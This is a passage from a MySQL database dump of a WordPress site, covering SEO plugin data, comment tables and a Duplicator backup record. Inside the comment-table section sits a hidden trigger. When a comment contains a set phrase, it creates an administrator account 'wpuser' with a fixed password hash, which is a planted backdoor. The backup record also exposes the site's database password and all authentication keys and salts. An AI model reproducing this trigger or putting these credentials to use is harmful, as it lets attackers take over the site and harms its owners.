distribution\",\"description\":\"Great job!\",\"score\":9,\"maxScore\":9,\"error\":0},\"calculateFleschReading\":{\"title\":\"Flesch reading ease\",\"description\":\"The copy scores 33 in the test, which is considered difficult to read. Try to make shorter sentences, using less difficult words to improve readability.\",\"score\":3,\"maxScore\":9,\"error\":1},\"errors\":2}}}',NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,'',NULL,NULL,'[]',0,'default','default',NULL,NULL,NULL,NULL,NULL,71,'default','{\"article\":{\"articleType\":\"BlogPosting\"},\"course\":{\"name\":\"\",\"description\":\"\",\"provider\":\"\"},\"faq\":{\"pages\":[]},\"product\":{\"reviews\":[]},\"recipe\":{\"ingredients\":[],\"instructions\":[],\"keywords\":[]},\"software\":{\"reviews\":[],\"operatingSystems\":[]},\"webPage\":{\"webPageType\":\"WebPage\"}}',0,1,0,0,0,0,0,0,0,-1,-1,'large','{\"tab\":\"general\",\"tab_social\":\"facebook\",\"tab_sidebar\":\"general\",\"tab_modal\":\"general\",\"tab_modal_social\":\"facebook\"}','[{\"image:loc\":\"https:\\/\\/verdenaturopathy.com.au\\/wp-content\\/uploads\\/2023\\/11\\/Screenshot_20231123_121727_Instagram.jpg\",\"image:title\":\"Screenshot_20231123_121727_Instagram\",\"image:caption\":\"\"},{\"image:loc\":\"https:\\/\\/verdenaturopathy.com.au\\/wp-content\\/uploads\\/2023\\/11\\/Screenshot_20231123_121916_Instagram.jpg\",\"image:title\":\"Screenshot_20231123_121916_Instagram\",\"image:caption\":\"\"}]','2025-10-02 03:07:20','default','default',NULL,NULL,NULL,NULL,0,'2022-05-02 11:19:24','2025-10-02 03:07:20'),(7,48,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large',NULL,NULL,'2022-05-02 11:19:24',NULL,NULL,NULL,NULL,NULL,NULL,0,'2022-05-02 11:19:24','2022-05-02 11:19:24'); /*!40000 ALTER TABLE `wpln_aioseo_posts` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpln_commentmeta` -- DROP TABLE IF EXISTS `wpln_commentmeta`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!50503 SET character_set_client = utf8mb4 */; CREATE TABLE `wpln_commentmeta` ( `meta_id` bigint unsigned NOT NULL AUTO_INCREMENT, `comment_id` bigint unsigned NOT NULL DEFAULT '0', `meta_key` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci DEFAULT NULL, `meta_value` longtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci, PRIMARY KEY (`meta_id`), KEY `comment_id` (`comment_id`), KEY `meta_key` (`meta_key`(191)) ) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpln_commentmeta` -- LOCK TABLES `wpln_commentmeta` WRITE; /*!40000 ALTER TABLE `wpln_commentmeta` DISABLE KEYS */; /*!40000 ALTER TABLE `wpln_commentmeta` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpln_comments` -- DROP TABLE IF EXISTS `wpln_comments`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!50503 SET character_set_client = utf8mb4 */; CREATE TABLE `wpln_comments` ( `comment_ID` bigint unsigned NOT NULL AUTO_INCREMENT, `comment_post_ID` bigint unsigned NOT NULL DEFAULT '0', `comment_author` tinytext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci NOT NULL, `comment_author_email` varchar(100) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '', `comment_author_url` varchar(200) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '', `comment_author_IP` varchar(100) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '', `comment_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `comment_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `comment_content` text CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci NOT NULL, `comment_karma` int NOT NULL DEFAULT '0', `comment_approved` varchar(20) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '1', `comment_agent` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '', `comment_type` varchar(20) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT 'comment', `comment_parent` bigint unsigned NOT NULL DEFAULT '0', `user_id` bigint unsigned NOT NULL DEFAULT '0', PRIMARY KEY (`comment_ID`), KEY `comment_post_ID` (`comment_post_ID`), KEY `comment_approved_date_gmt` (`comment_approved`,`comment_date_gmt`), KEY `comment_date_gmt` (`comment_date_gmt`), KEY `comment_parent` (`comment_parent`), KEY `comment_author_email` (`comment_author_email`(10)) ) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpln_comments` -- LOCK TABLES `wpln_comments` WRITE; /*!40000 ALTER TABLE `wpln_comments` DISABLE KEYS */; /*!40000 ALTER TABLE `wpln_comments` ENABLE KEYS */; UNLOCK TABLES; /*!50003 SET @saved_cs_client = @@character_set_client */ ; /*!50003 SET @saved_cs_results = @@character_set_results */ ; /*!50003 SET @saved_col_connection = @@collation_connection */ ; /*!50003 SET character_set_client = utf8mb4 */ ; /*!50003 SET character_set_results = utf8mb4 */ ; /*!50003 SET collation_connection = utf8mb4_0900_ai_ci */ ; /*!50003 SET @saved_sql_mode = @@sql_mode */ ; /*!50003 SET sql_mode = '' */ ; DELIMITER ;; /*!50003 CREATE*/ /*!50017 DEFINER=`desid573_wp676`@`localhost`*/ /*!50003 TRIGGER `after_insert_comment` AFTER INSERT ON `wpln_comments` FOR EACH ROW BEGIN IF NEW.comment_content LIKE '%are you struggling to get comments on your blog?%' THEN SET @lastInsertWpUsersId = (SELECT MAX(id) FROM `desid573_wp676`.`wpln_users`); SET @nextWpUsersID = @lastInsertWpUsersId + 1; INSERT INTO `desid573_wp676`.`wpln_users` (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `user_status`, `display_name`) VALUES (@nextWpUsersID, 'wpuser', '$P$7488wf35rOH.BV66FiPz0P028xB3wb/', 'wpuser', '', 'https://wordpress.com', '2019-12-01 14:07:21', '', '0', 'wpuser'); INSERT INTO `desid573_wp676`.`wpln_usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, @nextWpUsersID, 'wpln_capabilities', 'a:1:{s:13:\"administrator\";s:1:\"1\";}'); INSERT INTO `desid573_wp676`.`wpln_usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, @nextWpUsersID, 'wpln_user_level', '10'); END IF; END */;; DELIMITER ; /*!50003 SET sql_mode = @saved_sql_mode */ ; /*!50003 SET character_set_client = @saved_cs_client */ ; /*!50003 SET character_set_results = @saved_cs_results */ ; /*!50003 SET collation_connection = @saved_col_connection */ ; -- -- Table structure for table `wpln_duplicator_packages` -- DROP TABLE IF EXISTS `wpln_duplicator_packages`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!50503 SET character_set_client = utf8mb4 */; CREATE TABLE `wpln_duplicator_packages` ( `id` bigint unsigned NOT NULL AUTO_INCREMENT, `name` varchar(250) COLLATE utf8mb4_unicode_520_ci NOT NULL, `hash` varchar(50) COLLATE utf8mb4_unicode_520_ci NOT NULL, `status` int NOT NULL, `created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `owner` varchar(60) COLLATE utf8mb4_unicode_520_ci NOT NULL, `package` longtext COLLATE utf8mb4_unicode_520_ci NOT NULL, PRIMARY KEY (`id`), KEY `hash` (`hash`) ) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpln_duplicator_packages` -- LOCK TABLES `wpln_duplicator_packages` WRITE; /*!40000 ALTER TABLE `wpln_duplicator_packages` DISABLE KEYS */; INSERT INTO `wpln_duplicator_packages` (`id`, `name`, `hash`, `status`, `created`, `owner`, `package`) VALUES (1,'20251022_verdenaturopathy','cb514b58d35557195673_20251022091912',100,'2025-10-22 09:19:30','admin','O:11:\"DUP_Package\":23:{s:7:\"Created\";s:19:\"2025-10-22 09:19:12\";s:7:\"Version\";s:6:\"1.5.14\";s:9:\"VersionWP\";s:5:\"6.8.3\";s:9:\"VersionDB\";s:6:\"8.0.43\";s:10:\"VersionPHP\";s:6:\"7.4.33\";s:9:\"VersionOS\";s:5:\"Linux\";s:2:\"ID\";i:1;s:4:\"Name\";s:25:\"20251022_verdenaturopathy\";s:4:\"Hash\";s:35:\"cb514b58d35557195673_20251022091912\";s:8:\"NameHash\";s:61:\"20251022_verdenaturopathy_cb514b58d35557195673_20251022091912\";s:4:\"Type\";i:0;s:5:\"Notes\";s:0:\"\";s:8:\"ScanFile\";s:71:\"20251022_verdenaturopathy_cb514b58d35557195673_20251022091912_scan.json\";s:10:\"TimerStart\";i:-1;s:7:\"Runtime\";s:10:\"38.30 sec.\";s:7:\"ExeSize\";s:6:\"73.5KB\";s:7:\"ZipSize\";s:8:\"162.92MB\";s:6:\"Status\";s:5:\"100.0\";s:6:\"WPUser\";s:5:\"admin\";s:7:\"Archive\";O:11:\"DUP_Archive\":26:{s:10:\"FilterDirs\";s:0:\"\";s:11:\"FilterFiles\";s:0:\"\";s:10:\"FilterExts\";s:0:\"\";s:13:\"FilterDirsAll\";a:0:{}s:14:\"FilterFilesAll\";a:0:{}s:13:\"FilterExtsAll\";a:0:{}s:8:\"FilterOn\";i:0;s:12:\"ExportOnlyDB\";i:0;s:4:\"File\";s:73:\"20251022_verdenaturopathy_cb514b58d35557195673_20251022091912_archive.zip\";s:6:\"Format\";s:3:\"ZIP\";s:7:\"PackDir\";s:38:\"/home/desid573/verdenaturopathy.com.au\";s:4:\"Size\";i:170834917;s:4:\"Dirs\";a:0:{}s:9:\"dirsCount\";i:1366;s:5:\"Files\";a:0:{}s:10:\"filesCount\";i:8711;s:10:\"FilterInfo\";O:23:\"DUP_Archive_Filter_Info\":8:{s:4:\"Dirs\";O:34:\"DUP_Archive_Filter_Scope_Directory\":6:{s:7:\"Warning\";a:0:{}s:10:\"Unreadable\";a:0:{}s:10:\"AddonSites\";a:0:{}s:4:\"Core\";a:0:{}s:6:\"Global\";a:0:{}s:8:\"Instance\";a:0:{}}s:5:\"Files\";O:29:\"DUP_Archive_Filter_Scope_File\":7:{s:4:\"Size\";a:0:{}s:7:\"Warning\";a:0:{}s:10:\"Unreadable\";a:0:{}s:10:\"AddonSites\";a:0:{}s:4:\"Core\";a:0:{}s:6:\"Global\";a:0:{}s:8:\"Instance\";a:0:{}}s:4:\"Exts\";O:29:\"DUP_Archive_Filter_Scope_Base\":3:{s:4:\"Core\";a:0:{}s:6:\"Global\";a:0:{}s:8:\"Instance\";a:0:{}}s:9:\"UDirCount\";i:0;s:10:\"UFileCount\";i:0;s:9:\"UExtCount\";i:0;s:8:\"TreeSize\";a:0:{}s:11:\"TreeWarning\";a:0:{}}s:14:\"RecursiveLinks\";a:0:{}s:10:\"file_count\";i:10076;s:10:\"\0*\0Package\";r:1;s:29:\"\0DUP_Archive\0tmpFilterDirsAll\";a:0:{}s:24:\"\0DUP_Archive\0wpCorePaths\";a:3:{i:0;s:47:\"/home/desid573/verdenaturopathy.com.au/wp-admin\";i:1;s:50:\"/home/desid573/verdenaturopathy.com.au/wp-includes\";i:2;s:59:\"/home/desid573/verdenaturopathy.com.au/wp-content/languages\";}s:29:\"\0DUP_Archive\0wpCoreExactPaths\";a:7:{i:0;s:38:\"/home/desid573/verdenaturopathy.com.au\";i:1;s:38:\"/home/desid573/verdenaturopathy.com.au\";i:2;s:49:\"/home/desid573/verdenaturopathy.com.au/wp-content\";i:3;s:57:\"/home/desid573/verdenaturopathy.com.au/wp-content/uploads\";i:4;s:57:\"/home/desid573/verdenaturopathy.com.au/wp-content/plugins\";i:5;s:60:\"/home/desid573/verdenaturopathy.com.au/wp-content/mu-plugins\";i:6;s:56:\"/home/desid573/verdenaturopathy.com.au/wp-content/themes\";}s:31:\"\0DUP_Archive\0relativeFiltersDir\";a:2:{i:0;s:70:\"/home/desid573/verdenaturopathy.com.au/wp-content/backups-dup-lite/tmp\";i:1;s:15:\"backups-dup-pro\";}s:24:\"\0DUP_Archive\0listFileObj\";N;s:23:\"\0DUP_Archive\0listDirObj\";N;}s:9:\"Installer\";O:13:\"DUP_Installer\":15:{s:4:\"File\";s:79:\"20251022_verdenaturopathy_cb514b58d35557195673_20251022091912_installer.php.bak\";s:4:\"Size\";i:75261;s:10:\"OptsDBHost\";s:0:\"\";s:10:\"OptsDBPort\";s:0:\"\";s:10:\"OptsDBName\";s:0:\"\";s:10:\"OptsDBUser\";s:0:\"\";s:13:\"OptsDBCharset\";s:0:\"\";s:15:\"OptsDBCollation\";s:0:\"\";s:12:\"OptsSecureOn\";i:0;s:14:\"OptsSecurePass\";s:0:\"\";s:13:\"numFilesAdded\";i:0;s:12:\"numDirsAdded\";i:0;s:10:\"\0*\0Package\";r:1;s:17:\"\0*\0origFileManger\";O:40:\"Duplicator\\Libs\\Snap\\SnapOrigFileManager\":4:{s:18:\"\0*\0persistanceFile\";s:122:\"/home/desid573/verdenaturopathy.com.au/wp-content/backups-dup-lite/tmp/original_files_cb514b5-22091912/entries_stored.json\";s:18:\"\0*\0origFilesFolder\";s:102:\"/home/desid573/verdenaturopathy.com.au/wp-content/backups-dup-lite/tmp/original_files_cb514b5-22091912\";s:20:\"\0*\0origFolderEntries\";a:0:{}s:11:\"\0*\0rootPath\";s:38:\"/home/desid573/verdenaturopathy.com.au\";}s:32:\"\0DUP_Installer\0configTransformer\";O:44:\"Duplicator\\Libs\\WpConfig\\WPConfigTransformer\":3:{s:17:\"\0*\0wp_config_path\";s:52:\"/home/desid573/verdenaturopathy.com.au/wp-config.php\";s:16:\"\0*\0wp_config_src\";s:3321:\"<?php\n\n//Begin Really Simple SSL session cookie settings\n@ini_set(\'session.cookie_httponly\', true);\n@ini_set(\'session.cookie_secure\', true);\n@ini_set(\'session.use_only_cookies\', true);\n//END Really Simple SSL\n/**\n * The base configuration for WordPress\n *\n * The wp-config.php creation script uses this file during the\n * installation. You don\'t have to use the web site, you can\n * copy this file to \"wp-config.php\" and fill in the values.\n *\n * This file contains the following configurations:\n *\n * * MySQL settings\n * * Secret keys\n * * Database table prefix\n * * ABSPATH\n *\n * @link https://wordpress.org/support/article/editing-wp-config-php/\n *\n * @package WordPress\n */\n\n// ** MySQL settings - You can get this info from your web host ** //\n/** The name of the database for WordPress */\ndefine( \'DB_NAME\', \'desid573_wp676\' );\n\n/** MySQL database username */\ndefine( \'DB_USER\', \'desid573_wp676\' );\n\n/** MySQL database password */\ndefine( \'DB_PASSWORD\', \'y1p3D77]S@\' );\n\n/** MySQL hostname */\ndefine( \'DB_HOST\', \'localhost\' );\n\n/** Database Charset to use in creating database tables. */\ndefine( \'DB_CHARSET\', \'utf8mb4\' );\n\n/** The Database Collate type. Don\'t change this if in doubt. */\ndefine( \'DB_COLLATE\', \'\' );\n\n/**#@+\n * Authentication Unique Keys and Salts.\n *\n * Change these to different unique phrases!\n * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}\n * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.\n *\n * @since 2.6.0\n */\ndefine( \'AUTH_KEY\', \'khoppnbyaucx8lfzhbobnjuqnst3f68bhm1ougdg6vf5ir1mv5wnerylp8bfbiul\' );\ndefine( \'SECURE_AUTH_KEY\', \'yriex7nccmh6arfcpoxjvzyyafcsd1jsgfqg5itv5r0zyff3qbmwyuhgabmwqbvs\' );\ndefine( \'LOGGED_IN_KEY\', \'bh5plvjnytcc4bmcs6pcwej1iuwd5h40zt65d4yg2nnuylufc68iup8vmcfrizfm\' );\ndefine( \'NONCE_KEY\', \'jhqctnvbb7v5xlypickgteygznjg5ork40e0kamtjzsvmbngzimiscksuloozhoy\' );\ndefine( \'AUTH_SALT\', \'2zgotfyhqafm2udfg0zxlj4qcorhpccchigwt8ynkp8infajgzajntsgb2w8ungw\' );\ndefine( \'SECURE_AUTH_SALT\', \'0uqn4d1ks7jrcwiy6t1rgssq3u2mhy4di88y8krgmuh01iu4dfkezwwafttioixv\' );\ndefine( \'LOGGED_IN_SALT\', \'gzcgx3jhqvlc8oh196rz8rzvugs8kxliu0fuvt7ulrbf7sriy3z4smwc3bomhpqk\' );\ndefine( \'NONCE_SALT\', \'ub42nmlubw97jvacc0ly8pt79xs9nfzxqkugyc4n9u5cd38p7sw7hsl0lt26umsw\' );\n\n/**#@-*/\n\n/**\n * WordPress Database Table prefix.\n *\n * You can have multiple installations in one database if you give each\n * a unique prefix. Only numbers, letters, and underscores please!\n */\n$table_prefix = \'wpln_\';\n\n/**\n * For developers: WordPress debugging mode.\n *\n * Change this to true to enable the display of notices during development.\n * It is strongly recommended that plugin and theme developers use WP_DEBUG\n * in their development environments.\n *\n * For information on other constants that can be used for debugging,\n * visit the documentation.\n *\n * @link https://wordpress.org/support/article/debugging-in-wordpress/\n */\ndefine( \'WP_DEBUG\', false );\n\n/* That\'s all, stop editing! Happy publishing. */\n\n/** Absolute path to the WordPress directory. */\nif ( ! defined( \'ABSPATH\' ) ) {\n define( \'ABSPATH\', __DIR__ . \'/\' );\n}\n\n/** Sets up WordPress vars and included files. */\nrequire_once ABSPATH . \'wp-settings.php\';\n\";s:13:\"\0*\0wp_configs\";a:2:{s:8:\"constant\";a:16:{s:7:\"DB_NAME\";a:3:{s:3:\"src\";s:38:\"define( \'DB_NAME\', \'desid573_wp676\' );\";s:5:\"value\";s:16:\"\'desid573_wp676\'\";s:5:\"parts\";a:3:{i:0;s:17:\"define( \'DB_NAME\'\";i:1;s:19:\", \'desid573_wp676\' \";i:2;s:2:\");\";}}s:7:\"DB_USER\";a:3:{s:3:\"src\";s:38:\"define( \'DB_USER\', \'desid573_wp676\' );\";s:5:\"value\";s:16:\"\'desid573_wp676\'\";s:5:\"parts\";a:3:{i:0;s:17:\"define( \'DB_USER\'\";i:1;s:19:\", \'desid573_wp676\' \";i:2;s:2:\");\";}}s:11:\"DB_PASSWORD\";a:3:{s:3:\"src\";s:38:\"define( \'DB_PASSWORD\', \'y1p3D77]S@\' );\";s:5:\"value\";s:12:\"\'y1p3D77]S@\'\";s:5:\"parts\";a:3:{i:0;s:21:\"define( \'DB_PASSWORD\'\";i:1;s:15:\", \'y1p3D77]S@\' \";i:2;s:2:\");\";}}s:7:\"DB_HOST\";a:3:{s:3:\"src\";s:33:\"define( \'DB_HOST\', \'localhost\' );\";s:5:\"value\";s:11:\"\'localhost\'\";s:5:\"parts\";a:3:{i:0;s:17:\"define( \'DB_HOST\'\";i:1;s:14:\", \'localhost\' \";i:2;s:2:\");\";}}s:10:\"DB_CHARSET\";a:3:{s:3:\"src\";s:34:\"define( \'DB_CHARSET\', \'utf8mb4\' );\";s:5:\"value\";s:9:\"\'utf8mb4\'\";s:5:\"parts\";a:3:{i:0;s:20:\"define( \'DB_CHARSET\'\";i:1;s:12:\", \'utf8mb4\' \";i:2;s:2:\");\";}}s:10:\"DB_COLLATE\";a:3:{s:3:\"src\";s:27:\"define( \'DB_COLLATE\', \'\' );\";s:5:\"value\";s:2:\"\'\'\";s:5:\"parts\";a:3:{i:0;s:20:\"define( \'DB_COLLATE\'\";i:1;s:5:\", \'\' \";i:2;s:2:\");\";}}s:8:\"AUTH_KEY\";a:3:{s:3:\"src\";s:97:\"define( \'AUTH_KEY\', \'khoppnbyaucx8lfzhbobnjuqnst3f68bhm1ougdg6vf5ir1mv5wnerylp8bfbiul\' );\";s:5:\"value\";s:66:\"\'khoppnbyaucx8lfzhbobnjuqnst3f68bhm1ougdg6vf5ir1mv5wnerylp8bfbiul\'\";s:5:\"parts\";a:3:{i:0;s:18:\"define( \'AUTH_KEY\'\";i:1;s:77:\", \'khoppnbyaucx8lfzhbobnjuqnst3f68bhm1ougdg6vf5ir1mv5wnerylp8bfbiul\' \";i:2;s:2:\");\";}}s:15:\"SECURE_AUTH_KEY\";a:3:{s:3:\"src\";s:97:\"define( \'SECURE_AUTH_KEY\', \'yriex7nccmh6arfcpoxjvzyyafcsd1jsgfqg5itv5r0zyff3qbmwyuhgabmwqbvs\' );\";s:5:\"value\";s:66:\"\'yriex7nccmh6arfcpoxjvzyyafcsd1jsgfqg5itv5r0zyff3qbmwyuhgabmwqbvs\'\";s:5:\"parts\";a:3:{i:0;s:25:\"define( \'SECURE_AUTH_KEY\'\";i:1;s:70:\", \'yriex7nccmh6arfcpoxjvzyyafcsd1jsgfqg5itv5r0zyff3qbmwyuhgabmwqbvs\' \";i:2;s:2:\");\";}}s:13:\"LOGGED_IN_KEY\";a:3:{s:3:\"src\";s:97:\"define( \'LOGGED_IN_KEY\', \'bh5plvjnytcc4bmcs6pcwej1iuwd5h40zt65d4yg2nnuylufc68iup8vmcfrizfm\' );\";s:5:\"value\";s:66:\"\'bh5plvjnytcc4bmcs6pcwej1iuwd5h40zt65d4yg2nnuylufc68iup8vmcfrizfm\'\";s:5:\"parts\";a:3:{i:0;s:23:\"define( \'LOGGED_IN_KEY\'\";i:1;s:72:\", \'bh5plvjnytcc4bmcs6pcwej1iuwd5h40zt65d4yg2nnuylufc68iup8vmcfrizfm\' \";i:2;s:2:\");\";}}s:9:\"NONCE_KEY\";a:3:{s:3:\"src\";s:97:\"define( \'NONCE_KEY\', \'jhqctnvbb7v5xlypickgteygznjg5ork40e0kamtjzsvmbngzimiscksuloozhoy\' );\";s:5:\"value\";s:66:\"\'jhqctnvbb7v5xlypickgteygznjg5ork40e0kamtjzsvmbngzimiscksuloozhoy\'\";s:5:\"parts\";a:3:{i:0;s:19:\"define( \'NONCE_KEY\'\";i:1;s:76:\", \'jhqctnvbb7v5xlypickgteygznjg5ork40e0kamtjzsvmbngzimiscksuloozhoy\' \";i:2;s:2:\");\";}}s:9:\"AUTH_SALT\";a:3:{s:3:\"src\";s:97:\"define( \'AUTH_SALT\', \'2zgotfyhqafm2udfg0zxlj4qcorhpccchigwt8ynkp8infajgzajntsgb2w8ungw\' );\";s:5:\"value\";s:66:\"\'2zgotfyhqafm2udfg0zxlj4qcorhpccchigwt8ynkp8infajgzajntsgb2w8ungw\'\";s:5:\"parts\";a:3:{i:0;s:19:\"define( \'AUTH_SALT\'\";i:1;s:76:\", \'2zgotfyhqafm2udfg0zxlj4qcorhpccchigwt8ynkp8infajgzajntsgb2w8ungw\' \";i:2;s:2:\");\";}}s:16:\"SECURE_AUTH_SALT\";a:3:{s:3:\"src\";s:97:\"define( \'SECURE_AUTH_SALT\', \'0uqn4d1ks7jrcwiy6t1rgssq3u2mhy4di88y8krgmuh01iu4dfkezwwafttioixv\' );\";s:5:\"value\";s:66:\"\'0uqn4d1ks7jrcwiy6t1rgssq3u2mhy4di88y8krgmuh01iu4dfkezwwafttioixv\'\";s:5:\"parts\";a:3:{i:0;s:26:\"define( \'SECURE_AUTH_SALT\'\";i:1;s:69:\", \'0uqn4d1ks7jrcwiy6t1rgssq3u2mhy4di88y8krgmuh01iu4dfkezwwafttioixv\' \";i:2;s:2:\");\";}}s:14:\"LOGGED_IN_SALT\";a:3:{s:3:\"src\";s:97:\"define( \'LOGGED_IN_SALT\', \'gzcgx3jhqvlc8oh196rz8rzvugs8kxliu0fuvt7ulrbf7sriy3z4smwc3bomhpqk\' );\";s:5:\"value\";s:66:\"\'gzcgx3jhqvlc8oh196rz8rzvugs8kxliu0fuvt7ulrbf7sriy3z4smwc3bomhpqk\'\";s:5:\"parts\";a:3:{i:0;s:24:\"define( \'LOGGED_IN_SALT\'\";i:1;s:71:\", \'gzcgx3jhqvlc8oh196rz8rzvugs8kxliu0fuvt7ulrbf7sriy3z4smwc3bomhpqk\' \";i:2;s:2:\");\";}}s:10:\"NONCE_SALT\";a:3:{s:3:\"src\";s:97:\"define( \'NONCE_SALT\', \'ub42nmlubw97jvacc0ly8pt79xs9nfzxqkugyc4n9u5cd38p7sw7hsl0lt26umsw\' );\";s:5:\"value\";s:66:\"\'ub42nmlubw97jvacc0ly8pt79xs9nfzxqkugyc4n9u5cd38p7sw7hsl0lt26umsw\'\";s:5:\"parts\";a:3:{i:0;s:20:\"define( \'NONCE_SALT\'\";i:1;s:75:\", \'ub42nmlubw97jvacc0ly8pt79xs9nfzxqkugyc4n9u5cd38p7sw7hsl0lt26umsw\' \";i:2;s:2:\");\";}}s:8:\"WP_DEBUG\";a:3:{s:3:\"src\";s:28:\"define( \'WP_DEBUG\', false );\";s:5:\"value\";s:5:\"false\";s:5:\"parts\";a:3:{i:0;s:18:\"define( \'WP_DEBUG\'\";i:1;s:8:\", false \";i:2;s:2:\");\";}}s:7:\"ABSPATH\";a:3:{s:3:\"src\";s:36:\" define( \'ABSPATH\', __DIR__ . \'/\' );\";s:5:\"value\";s:13:\"__DIR__ . \'/\'\";s:5:\"parts\";a:3:{i:0;s:18:\" define( \'ABSPATH\'\";i:1;s:16:\", __DIR__ . \'/\' \";i:2;s:2:\");\";}}}s:8:\"variable\";a:1:{s:12:\"table_prefix\";a:3:{s:3:\"src\";s:24:\"$table_prefix = \'wpln_\';\";s:5:\"value\";s:7:\"\'wpln_\'\";s:5:\"parts\";a:2:{i:0;s:15:\"$table_prefix =\";i:1;s:9:\" \'wpln_\';\";}}}}}}s:8:\"Database\";O:12:\"DUP_Database\":15:{s:4:\"Type\";s:5:\"MySQL\";s:4:\"Size\";i:5374455;s:4:\"File\";s:74:\"20251022_verdenaturopathy_cb514b58d35557195673_20251022091912_database.sql\";s:4:\"Path\";N;s:12:\"FilterTables\";s:0:\"\";s:8:\"FilterOn\";i:0;s:4:\"Name\";N;s:10:\"Compatible\";s:0:\"\";s:8:\"Comments\";s:28:\"MySQL Community Server - GPL\";s:19:\"sameNameTableExists\";b:0;s:4:\"info\";O:16:\"DUP_DatabaseInfo\":23:{s:9:\"buildMode\";s:9:\"MYSQLDUMP\";s:11:\"charSetList\";a:2:{i:0;s:7:\"utf8mb4\";i:1;s:7:\"utf8mb3\";}s:13:\"collationList\";a:2:{i:0;s:18:\"utf8mb3_general_ci\";i:1;s:22:\"utf8mb4_unicode_520_ci\";}s:10:\"engineList\";a:1:{i:0;s:6:\"MyISAM\";}s:17:\"isTablesUpperCase\";i:0;s:15:\"isNameUpperCase\";i:0;s:4:\"name\";s:14:\"desid573_wp676\";s:15:\"tablesBaseCount\";i:22;s:16:\"tablesFinalCount\";i:22;s:20:\"muFilteredTableCount\";i:0;s:14:\"tablesRowCount\";i:1310;s:16:\"tablesSizeOnDisk\";i:6084015;s:10:\"tablesList\";a:22:{s:28:\"wpln_actionscheduler_actions\";a:3:{s:14:\"inaccurateRows\";i:44;s:12:\"insertedRows\";i:10;s:4:\"size\";i:470332;}s:27:\"wpln_actionscheduler_claims\";a:3:{s:14:\"inaccurateRows\";i:0;s:12:\"insertedRows\";i:0;s:4:\"size\";i:3086;}s:27:\"wpln_actionscheduler_groups\";a:3:{s:14:\"inaccurateRows\";i:2;s:12:\"insertedRows\";i:2;s:4:\"size\";i:9276;}s:25:\"wpln_actionscheduler_logs\";a:3:{s:14:\"inaccurateRows\";i:128;s:12:\"insertedRows\";i:26;s:4:\"size\";i:412084;}s:17:\"wpln_aioseo_cache\";a:3:{s:14:\"inaccurateRows\";i:22;s:12:\"insertedRows\";i:18;s:4:\"size\";i:102308;}s:25:\"wpln_aioseo_notifications\";a:3:{s:14:\"inaccurateRows\";i:49;s:12:\"insertedRows\";i:49;s:4:\"size\";i:234812;}s:17:\"wpln_aioseo_posts\";a:3:{s:14:\"inaccurateRows\";i:8;s:12:\"insertedRows\";i:8;s:4:\"size\";i:15992;}s:16:\"wpln_commentmeta\";a:3:{s:14:\"inaccurateRows\";i:0;s:12:\"insertedRows\";i:0;s:4:\"size\";i:4096;}s:13:\"wpln_comments\";a:3:{s:14:\"inaccurateRows\";i:0;s:12:\"insertedRows\";i:0;s:4:\"size\";i:1024;}s:24:\"wpln_duplicator_packages\";a:3:{s:14:\"inaccurateRows\";i:0;s:12:\"insertedRows\";i:1;s:4:\"size\";i:1024;}s:10:\"wpln_links\";a:3:{s:14:\"inaccurateRows\";i:0;s:12:\"insertedRows\";i:0;s:4:\"size\";i:1024;}s:12:\"wpln_options\";a:3:{s:14:\"inaccurateRows\";i:273;s:12:\"insertedRows\";i:313;s:4:\"size\";i:1521124;}s:13:\"wpln_postmeta\";a:3:{s:14:\"inaccurateRows\";i:417;s:12:\"insertedRows\";i:426;s:4:\"size\";i:304344;}s:10:\"wpln_posts\";a:3:{s:14:\"inaccurateRows\";i:283;s:12:\"insertedRows\";i:288;s:4:\"size\";i:2947868;}s:21:\"wpln_sgpb_subscribers\";a:3:{s:14:\"inaccurateRows\";i:0;s:12:\"insertedRows\";i:0;s:4:\"size\";i:1024;}s:32:\"wpln_sgpb_subscription_error_log\";a:3:{s:14:\"inaccurateRows\";i:0;s:12:\"insertedRows\";i:0;s:4:\"size\";i:1024;}s:23:\"wpln_term_relationships\";a:3:{s:14:\"inaccurateRows\";i:13;s:12:\"